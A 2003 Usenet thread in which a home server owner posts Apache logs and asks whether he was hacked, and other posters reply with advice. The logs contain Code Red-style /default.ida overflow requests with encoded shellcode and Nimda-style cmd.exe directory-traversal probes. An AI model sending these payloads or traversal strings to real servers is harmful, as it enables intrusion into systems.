/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.204.221 - - [27/Jun/2003:08:05:10 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.204.221 - - [27/Jun/2003:08:55:08 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.12.138 - - [27/Jun/2003:09:10:30 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.196.209 - - [27/Jun/2003:09:18:26 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
218.236.196.209 - - [27/Jun/2003:09:20:31 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
HTTP/1.0" 404 283 "-" "-"
220.73.24.200 - - [27/Jun/2003:09:33:48 +0900] "GET /myhome/index.html
HTTP/1.1" 200 549 "http://myhome.hanafos.com/~abraxsus/" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"


Here he used several IP addresses...
Also this is httpd/error_log
192.168.x.x is my another computers connected to my box,
but, 218.x.x.x seems to be that hacker's IPs..


[Fri Jun 27 02:56:19 2003] [notice] Apache/1.3.20 (Unix) (Red-Hat/Linux)
mod_ssl/2.8.4 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01
configured -- resuming normal operations
[Fri Jun 27 02:56:19 2003] [notice] suEXEC mechanism enabled (wrapper:
/usr/sbin/suexec)
[Fri Jun 27 02:59:18 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 02:59:25 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 02:59:40 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/back.gif
[Fri Jun 27 02:59:41 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/back.gif
[Fri Jun 27 03:03:20 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:03:29 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 03:08:15 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:32:20 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 03:33:43 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:33:50 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 03:35:45 2003] [error] [client 218.236.61.59] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 03:47:19 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:47:25 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/root.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/MSADC/root.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/c/winnt/system32/cmd.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/d/winnt/system32/cmd.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not
exist:
/var/www/html/msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/c
md.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/..?../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/..À¯../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/..?../winnt/system32/cmd.exe
[Fri Jun 27 04:01:07 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:07 2003] [error] [client 218.147.95.14] File does not
exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Fri Jun 27 04:15:02 2003] [error] [client 218.50.170.120] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 04:36:42 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 04:46:42 2003] [error] [client 218.236.76.71] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 04:50:28 2003] [error] [client 218.64.85.21] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 04:57:48 2003] [error] [client 218.236.128.18] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 04:59:26 2003] [error] [client 218.236.128.18] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 04:59:35 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 05:01:10 2003] [error] [client 218.236.128.18] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 05:35:47 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 05:46:29 2003] [error] [client 218.236.76.71] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 06:08:27 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 06:11:54 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 06:53:23 2003] [error] mod_ssl: SSL handshake failed (server
localhost.localdomain:443, client 194.226.48.12) (OpenSSL library error
follows)
[Fri Jun 27 06:53:23 2003] [error] OpenSSL: error:0406506C:rsa
routines:RSA_EAY_PRIVATE_DECRYPT:data greater than mod len
[Fri Jun 27 06:53:23 2003] [error] OpenSSL: error:140BB004:SSL
routines:SSL_RSA_PRIVATE_DECRYPT:nested asn1 error
[Fri Jun 27 06:53:23 2003] [error] OpenSSL: error:1406B0CE:SSL
routines:GET_CLIENT_MASTER_KEY:problems mapping cipher functions
[Fri Jun 27 06:54:51 2003] [error] [client 218.236.235.252] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 07:19:36 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 07:30:45 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 07:31:02 2003] [error] [client 218.236.204.221] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 08:00:40 2003] [error] [client 218.236.204.221] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 08:05:10 2003] [error] [client 218.236.204.221] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 08:55:08 2003] [error] [client 218.236.204.221] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 09:10:30 2003] [error] [client 218.236.12.138] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 09:18:26 2003] [error] [client 218.236.196.209] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 09:20:31 2003] [error] [client 218.236.196.209] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 09:33:48 2003] [error] [client 220.73.24.200] File does not
exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 09:47:37 2003] [error] [client 218.238.80.247] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 09:54:06 2003] [error] [client 218.236.12.138] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 10:10:14 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 10:10:28 2003] [error] [client 218.88.34.99] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 10:26:12 2003] [error] [client 218.236.196.209] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 10:35:22 2003] [error] [client 218.149.39.14] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 11:40:52 2003] [error] [client 218.236.204.221] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 11:48:27 2003] [error] [client 218.236.4.72] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 11:49:58 2003] [error] [client 218.236.12.138] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:02:40 2003] [error] [client 218.236.168.182] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:02:55 2003] [error] [client 61.73.21.187] File does not
exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 12:04:19 2003] [error] [client 218.236.196.209] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:16:50 2003] [error] [client 218.236.111.207] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:29:55 2003] [error] [client 61.187.56.151] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:33:45 2003] [error] [client 218.147.128.68] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:45:09 2003] [error] [client 218.236.244.201] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:47:03 2003] [error] [client 218.236.168.182] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 12:47:11 2003] [error] [client 218.236.244.201] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 13:08:52 2003] [error] [client 218.236.226.4] File does not
exist: /var/www/html/default.ida
[Fri Jun 27 13:15:53 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 13:16:03 2003] [error] [client 192.168.0.2] File does not exist:
/var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 13:16:21 2003] [notice] caught SIGTERM, shutting down

What do you think about this??
What should I do?? where can I learn more about securities??

"Min,Lee" <abraxsus@nownuri.net> wrote in
news:bdgkk1$p1o$1@news.hananet.net:

> I think my server box is hacked !!
> help me!..
> These are my log files...
>

I agree - they seem to have root access if they were able to try mailing
all that info.

[snipp]
> Also I found somethings strange in the /var/log/httpd/accesslog
>
>
> 218.236.111.207 - - [27/Jun/2003:03:32:20 +0900] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX
> XXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
> XXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
> XXXXX
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%u
> cbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
> HTTP/1.0" 404 283 "-" "-"
>
> Here This is strange. "GET /deafault.ida" looks likes hacking, doesn't
> it??
>

This is Windows-only exploit, against IIS - don't worry about that one.

> What should I do?? where can I learn more about securities??

You should really try to read up some on security, yes.
Reading from the email, it seems you were running quite a few servers,
RPC and SMB for example - maybe you should take the time to re-install
your server (do not backup any binaries/programs) and start reading some
security books?

You didn't really write what distribution you were using, but if you
start at www.linuxsecurity.org and go from there, you will find some good
security guides to follow the next time.

http://www.redhat.com/solutions/security/ could be a good starting point
as well.

And, of course, searching google groups could prove quite helpful.

Khay.

I think it was Min,Lee who said:

>I think my server box is hacked !!

Maybe you're looking in all the wrong places....

> X-Newsreader:
> Microsoft Outlook Express 6.00.2600.0000

F.T.
--
Supporting alternative software now ensures that
we will be able to choose it in the future.
Just say No to Microsoft.

Fred Tourette <toomuchspam@myinbasket.com> wrote in news:3aVKa.24359
$0v4.1859704@bgtnsc04-news.ops.worldnet.att.net:

> I think it was Min,Lee who said:
>
>>I think my server box is hacked !!
>
> Maybe you're looking in all the wrong places....
>
>> X-Newsreader:
>> Microsoft Outlook Express 6.00.2600.0000
>
> F.T.

Oh my, you must be really proud of yourself now, reading all his 66KB of
information only to comment on his newsreader...

Khay.